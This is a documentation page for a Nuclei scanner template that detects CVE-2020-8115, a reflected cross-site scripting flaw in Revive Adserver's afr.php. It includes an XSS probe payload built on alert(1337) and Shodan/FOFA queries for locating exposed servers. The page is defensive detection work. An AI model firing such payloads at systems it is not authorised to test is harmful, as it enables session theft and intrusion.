Revive Adserver <=5.0.3 - Cross-Site Scripting
ID: CVE-2020-8115
Severity: medium
Author: madrobot,dwisiswant0
Tags: cve,cve2020,xss,hackerone,revive-adserver
Description
Section titled “Description”Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
YAML Source
Section titled “YAML Source”id: CVE-2020-8115
info: name: Revive Adserver <=5.0.3 - Cross-Site Scripting author: madrobot,dwisiswant0 severity: medium description: | Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie. reference: - https://hackerone.com/reports/775693 - https://www.revive-adserver.com/security/revive-sa-2020-001/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8115 - https://github.com/Elsfa7-110/kenzer-templates - https://github.com/merlinepedra/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-8115 cwe-id: CWE-79 epss-score: 0.0187 epss-percentile: 0.88393 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: revive-adserver product: revive_adserver shodan-query: - http.title:"revive adserver" - http.favicon.hash:106844876 fofa-query: - icon_hash=106844876 - title="revive adserver" google-query: intitle:"revive adserver" tags: cve,cve2020,xss,hackerone,revive-adserver
http: - method: GET path: - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
matchers-condition: and matchers: - type: regex part: body regex: - (?mi)window\.location\.replace\(".*alert\(1337\)
- type: word part: body words: - window.location.href.indexOf negative: true
- type: status status: - 200# digest: 4b0a0048304602210091d11a130c95bbc974aa2456864400589d321ba1fece4af2f94e24365a02a02b022100a044bac1a3f74c46b161f1f1db5d5619a5d125ed32fe784b6345bde8cd6a8bc6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-8115.yaml"